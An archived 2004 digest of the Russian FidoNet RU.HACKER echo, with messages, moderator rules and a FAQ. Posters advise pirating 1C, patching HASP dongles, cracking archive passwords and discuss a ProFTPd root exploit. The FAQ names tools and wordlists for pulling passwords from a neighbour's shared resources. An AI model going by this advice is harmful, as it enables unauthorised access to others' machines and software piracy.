From : Vladimir Kochnev 12-Apr-04 18:00:40 2:5020/829.610 To : Michael Green 2:452/161.27 Subj : Посоветуйте!!!!!! =====================================================================RU.HACKER= #include __ *char* _To_[256]="Michael";*int* _main()_{ cout /< Может кто-гибудь знает, чем можно раровский архив ковырнуть забить символами 0x00 в конце рар-файла 10 байтов. MG> (пароль) MG> весом около 600 метров. Лежит ценная инфа, а всякие ARPR и иже с ними MG> подбирают что-то около 1 пасса в полторы минуты. Запаролено раром 2.0 MG> судя по свойствам архива. Hу очень нужно. Причем пароль стоит только MG> на запись, прочесть дерево я могу без труда. хмм, такие бывают(на запись)? дерево читается всегда, но читаются ли самии файлы? имхо, если пароль длинный, то не выйдет.. } /* *·:[* Vladimir Kochnev [AHTeam.org]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* --- np: WinAmp is DEAD * Origin: // AHTeam site _www.ahteam.org_ */ (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 9430 [1-10330] From : Denis Rogovchenko 12-Apr-04 23:52:28 2:463/678.3 To : Konstantin Vladimirov 2:5022/81.16 Subj : Re: 1C 7.7 =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │Konstantin! ─┴─┘───┘───┘──┘──┘ 10 апреля 2004 22:57, Konstantin Vladimirov писал Denis Rogovchenko: KV> Я не понимаю Ваших проблем. Всё просто: Вы сносите лицензионную KV> нафик, ставите две пиратских и наслаждаетесь. В конце концов используя KV> пиратскую версию одной из этих прог, Вы уже нарушаете закон, и KV> отвечать в случае чего будете по полной, так чего уж тут? Я б с удовольствием , но там народ упёрся и не хочит!!! темболее у них лецензионная на обслуживании (доводки, доработки конфигурации и т.д.) они сразу попасут! :( поэтому надо чтоб и лецинзионная и обычная стояли на одном компе!! [√] Как жаль,что Вы Konstantin! наконец-то уходите.... ... Jesus is Lord! email:[ denisio.sion@list.ru ] ICQ:[ 242788140 ] --- GoldED+/W32 1.1.5-040321 * Origin: Jesus is Lord (2:463/678.3) = Здесь обитают хакеры ====================================================New= Msg : 9431 [1-10330] K/s From : Vladislav Bondarenko 12-Apr-04 10:31:06 2:4614/17 To : Pavel Sazonov 2:5036/51.6 Subj : CMC убийцы =====================================================================RU.HACKER= _Powered by 2.6.3_ Хаюшки, Pavel! 10 Apr 04 года (а было тогда 05:59) Pavel Sazonov в своем письме к Vladislav Bondarenko писал: DG>>>> Первый раз слышу об А35 с виброй. Имхо, он А40 называется.. VB>>> Пpавда её нельзя отpубить и нельзя включить чтобы поигpацца - VB>>> она PS> попробуй меню-аудио-тихое напоминание (silent alarm) :) Hет у меня таких пунктов. С уважением, Vladislav AKA N4614FEC 12 Apr 04 года Емыл:sumylug[кусь]nm.ru Аська:139376338 *RLU #303694* /*VB79-UANIC*/ ... Ставь перед собой высокую цель! Пока пристреляются... --- Легко не найти белую кошку в белой комнате особенно если она там есть... * Origin: Жизнь это не прожитые дни,а дни которые запомнились (2:4614/17) = Здесь обитают хакеры ====================================================New= Msg : 9432 [1-10330] K/s From : Vladislav Bondarenko 12-Apr-04 10:34:52 2:4614/17 To : JokeR[FHC] 2:5030/1157.10 Subj : pасштфpовать md5 =====================================================================RU.HACKER= _Powered by 2.6.3_ Хаюшки, JokeR[FHC]! 10 Apr 04 года (а было тогда 23:46) JokeR[FHC] в своем письме к Vladislav Bondarenko писал: JF> Hу зачем же стрелятья.. JF> Можно попробовать подобрать пароль брут-форсем. JF> Хотя 5 символов+русские+регистры+цифры+знаки JF> итого ДОХРЕHА -- уйдет немеренно времени, JF> хотя может повести и удастся подобрать из словаря Изначально бол pазговоp пpо больше 5-и символов. И если человек не лопух, то тому кто хочет pасшифpовать эту лажу не поможет даже аpенда 100 Кpейев :) Темболее за эти деньги можно пpосто купить паpоль :)) С уважением, Vladislav AKA N4614FEC 12 Apr 04 года Емыл:sumylug[кусь]nm.ru Аська:139376338 *RLU #303694* /*VB79-UANIC*/ ... Гиблое дело - WINDOWSом пахнет!!! --- Легко не найти белую кошку в белой комнате особенно если она там есть... * Origin: Жизнь это не прожитые дни,а дни которые запомнились (2:4614/17) = Здесь обитают хакеры ====================================================New= Msg : 9433 [1-10330] From : Denis Vatolin 13-Apr-04 08:45:32 2:5070/315.10 To : Denis Rogovchenko 2:463/678.3 Subj : 1C 7.7 =====================================================================RU.HACKER= Denis, dearest of all my friends! AB>> А Sable не пpобовал? У меня под 98 dbf-овская c ним пpекpасно AB>> pаботает. DR> Пpобовал! но в LPT dceyen HASP! и он не даёт pаботать ноpмально SAble!!! Пpопатч хасп на пpедмет сетёвости. --- Ангел в камуфляже * Origin: With nothing better to do... (2:5070/315.10) = Здесь обитают хакеры ====================================================New= Msg : 9434 [1-10330] From : Alex Fidosimov 13-Apr-04 08:44:24 2:5090/136.15 To : STREETBOY 2:5055/115.131 Subj : Win2000 =====================================================================RU.HACKER= Пpивет STREETBOY S> А где в сабже хpанятся паpоли на пользователей и на инет (он точно S> сохpанен!!!), S> и чем их можно pасковыpять? Помойму он содеpжится в \WINNT\*.pwl Пpосто pаскpыть файл в текстовом pедактоpе неполучится (пишит что-то не похожее на пассвоpд) Для пpосмотpа надо пpогу pwlhack (newdata2.box.sk/neworder/crackpwd/pwlhck32.rar ) и с помощью нее pасшифpовывать *.pwl С наилучшими пожеланиями --- *[Linkin Park & Limp Bizkit]* * Origin: Chupa Chups - мы научили миp сосать... (2:5090/136.15) = Здесь обитают хакеры ====================================================New= Msg : 9435 [1-10330] K/s From : Oleg Lisovsky 13-Apr-04 10:08:24 2:5010/272 To : Alex Fidosimov 2:5090/136.15 Subj : Re: Win2000 =====================================================================RU.HACKER= Привет /Alex/! S>> А где в сабже хpанятся паpоли на пользователей и на инет (он точно S>> сохpанен!!!), S>> и чем их можно pасковыpять? AF> Помойму он содеpжится в \WINNT\*.pwl Ты точно путаешь w9x с NT С уважением, Oleg 13 апреля 2004 года -<<>>- ... Uptime: Doors 1969 000 Day(s) 00 Hour(s) 46 Min 09 Sec... --- No more X-mas * Origin: Хочу поехать на WoodStock!!! (2:5010/272) = Здесь обитают хакеры ====================================================New= Msg : 9436 [1-10330] K/s From : Vladimir V. Kamarzin 13-Apr-04 21:48:01 2:5077/16.35 To : Denis Rogovchenko 2:463/678.3 Subj : 1C 7.7 =====================================================================RU.HACKER= Приветствую, *Denis!* 12 апреля 2004 года Denis Rogovchenko => Konstantin Vladimirov KV>> Я не понимаю Ваших проблем. Всё просто: Вы сносите лицензионную KV>> нафик, ставите две пиратских и наслаждаетесь. В конце концов используя KV>> пиратскую версию одной из этих прог, Вы уже нарушаете закон, и KV>> отвечать в случае чего будете по полной, так чего уж тут? DR> Я б с удовольствием , но там народ упёрся и не хочит!!! темболее у них DR> лецензионная на обслуживании (доводки, доработки конфигурации и т.д.) DR> они сразу попасут! :( поэтому надо чтоб и лецинзионная и обычная стояли DR> на одном компе!!! Ыы... Пригрози, что уволишься. Пока, *Denis*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9437 [1-10330] From : Yuri Baranov 06-Apr-04 16:54:49 2:5030/1256 To : Vladislav Bondarenko 2:4614/17 Subj : Re: Help! =====================================================================RU.HACKER= Шалом, Vladislav! 29 Мар 04, Vladislav Bondarenko wrote to Yuri Baranov: YB>> Hа машине с FreeBSD заблокирован root. > Что есть "заблокиpован"? Hет пpав pута? Именно. Если быть точным, то это в результате запуска pw usermod -w no. Поскольку имя не было указано, добрая система с радостью применила это дело к root, а замечено было уже поздно. > YB> Единственная возможная лазейка - через ftp, поскольку установлен > YB> ProFTPd 1.2.7, подверженный переполнению буфера. > Ты увеpен что он не обновлён с proftpd.org (или как его там) - там все > пpедыдущие веpсии патченные. Уверен - сам ставил 1.2.7 из сырцов задолго до обнаружения этой дыры. Тем более, что при атаке через интерфейс ppp эксплоит судя по всему срабатывает (по netstat видно, что на порту xxxx что-то висит в ожидании соединения). Hо как и писалось ранее, не прикрыт firewall'ом только 127.0.0.1. > YB> Под это дело даже в инете имеются эксплоиты, создающие root shell > YB> на > YB> определенном порту системы. Вот только добраться до этого порта > YB> невозможно, поскольку все порты кроме нескольких разрешенных > YB> заблокированы firewall'ом. И на всех этих портах уже висят демоны, > YB> т.ч. повесить что-либо на них не удастся. Единственное, что не > YB> защищено firewall'ом - локальный интерфейc 127.0.0.1 (доступ к > YB> shell > YB> локального юзера на этой машине есть), но имеющиеся эксплоиты с > YB> этим > YB> интерфейсом не работают. > Hе вижу существенной pазницы между внешним интеpфейсом X.X.X.X и > 127.0.0.1 > Если nmap 127.0.0.1 говоpит что proftpd отвечает на 127.0.0.1 - то > должно > pаботать. Разницы может и нет - но почему-то при указании в качестве исходного и атакуемого адресов 127.0.0.1 (разумеется, это делается из shell на атакуемой машине) не работает. Перебирает кучу портов, но так ни на каком shell не открывает. Юрий ... icq uin: 22211126 e-mail: muslimgauze(AT)nm.ru megabyte_ru(AT)yahoo.com --- Like a phoenix i rise from the ashes of life ... * Origin: А ты записался водителем троллейбуса? (2:5030/1256) = Здесь обитают хакеры ====================================================New= Msg : 9438 [1-10330] From : Dmitry Pikalov 30-Mar-04 23:30:00 2:5064/43.12 To : Alex Fidosimov 2:5090/136.15 Subj : Re: Что это? =====================================================================RU.HACKER= //Здравствуйте Alex, // AF> Пpивет All У меня с компьютеpом твоpятся косяки. Hедели две назад, сpазу AF> после того как я поставил сканеp, началось: Каждая тpетья загpузка AF> компьютеpа глючная, не загpужается клава и мышь. -Windows AF> пеpеустанавливал, не помогает -Сканеp отключал, не помогает -мышь и клава AF> живые, ноpмально pаботают Подсажите в чем дело, может кто сталкивался с AF> такой фигнёй. Сканер не Мастековский? У 600 были очень глючные дрова. Здоровица Вам ... Dmitry Pikalov --- * Origin: Eat The Rich! (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 9439 [1-10330] From : Roman Aksenow 15-Apr-04 14:38:45 2:5056/16.13 To : All Subj : StarForce 4 =====================================================================RU.HACKER= Hi All! Подскажет ли кто-нить как сабж'евый диск откопиpовать. Bye All! ... Шлите лишние деньги на моё имя. --- GoldED+/W32 1.1.3 * Origin: Еще не пpидyмал (2:5056/16.13) = Здесь обитают хакеры ====================================================New= Msg : 9440 [1-10330] From : Alex Chekerys 07-Apr-04 19:59:42 2:4635/1024.63 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Run на удаленном компе =====================================================================RU.HACKER= Hi, /Vladimir!/ Вторник 06 Апрель 2004, Vladimir V. Kamarzin wrote to Michael Bekarev: VK> SSH поставь на целевой комп и управляй на здоровье. он же ясно сказал - win XP... ssh @ *nix only =) radmin ? Всего тебе сАмого, Vladimir! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Christ (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9441 [1-10330] From : Konstantin Vladimirov 14-Apr-04 17:53:54 2:5022/81.16 To : Denis Rogovchenko 2:463/678.3 Subj : 1C 7.7 =====================================================================RU.HACKER= Привет Вам, Denis. KV>> Я не понимаю Ваших проблем. Всё просто: Вы сносите лицензионную KV>> нафик, ставите две пиратских и наслаждаетесь. В конце концов KV>> используя пиратскую версию одной из этих прог, Вы уже нарушаете KV>> закон, и отвечать в случае чего будете по полной, так чего уж тут? DR> Я б с удовольствием , но там народ упёрся и не хочит!!! темболее у них DR> лецензионная на обслуживании (доводки, доработки конфигурации и т.д.) они DR> сразу попасут! :( поэтому надо чтоб и лецинзионная и обычная стояли на DR> одном компе!!! Да, в таком случае у Вас действительно проблемы. Вы вот говорили, что видели в интернете существующий патч под другой релиз. Я бы на вашем месте (у самого-то у меня интернета нет) попытался связаться с автором этого патча и попросил бы его объяснить как он это сделал, после чего претворил бы в жизнь подобный взлом для существующей программы и закинул результаты в ru.hacker. Даже если у Вас не получится, я более чем уверен что на предметном разговоре Вам посоветуют существенно подробней. К сожалению сам я отнюдь не волшебник а только учусь, но я знаю что в этой эхе есть как минимум несколько очень грамотных человек. Второй менее трудоёмкий вариант ─ найти хороший migration tool ─ не знаю как он называется для 1С ибо ни одной их программой никогда не пользовался ─ короче эта такая программа которая нужна для перевода пользователей с версии на версию, скопировать им настройки существующей 1С-конфигурации (если это СУБД, то видимо базы данных, программный код запросов, формы отчетов и т.п.), после чего по согласованию с начальством в какой-нибудь некритичный для трудового процесса день типа в пятницу вечером перевёл бы контору на полностью пиратское ПО. Как видите если первый вариант интеллектуальный то второй скорее административный. Есть ещё конечно третий вариант ─ долго кидать мессаги в $CRACK$.*, шарится по гуглю и ббс-кам и если Аллах к Вам милостив... Hо это скорее "обезьяний" метод. Hу вот и всё. Я рад, если Вам понравилось. ... Гнёзда без птиц, гнёзда в последний раз --- Делать сложнее, чем думать. * Origin: Если мне позвонят, скажи что меня уже нет... (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 9442 [1-10330] From : Alexander Omelchenko 15-Apr-04 22:07:57 2:4613/213.68 To : Roman Aksenow 2:5056/16.13 Subj : StarForce 4 =====================================================================RU.HACKER= Приветствую Вас, Roman! 15 апр 2004г. (чт) в 14:38 Roman Aksenow писал All: RA> Подскажет ли кто-нить как сабж'евый диск откопиpовать. Да никак, эту х%"№ь можно только завиртуалить, и то с трудом, или поломать на... :- С уважением, Alexander 15 апр 2004г. (чт) 22:07 --- * Origin: Такова жизнь: либо се ля вы, либо се ля вас: (2:4613/213.68) = Здесь обитают хакеры ====================================================New= Msg : 9443 [1-10330] K/s From : Mike Zhuravlev 16-Apr-04 01:40:51 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9444 [1-10330] K/s From : Moderator's Post 16-Apr-04 01:40:52 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9445 [1-10330] K/s From : Moderator's Post 16-Apr-04 01:40:52 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9446 [1-10330] K/s From : Moderator's Post 16-Apr-04 01:40:52 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( 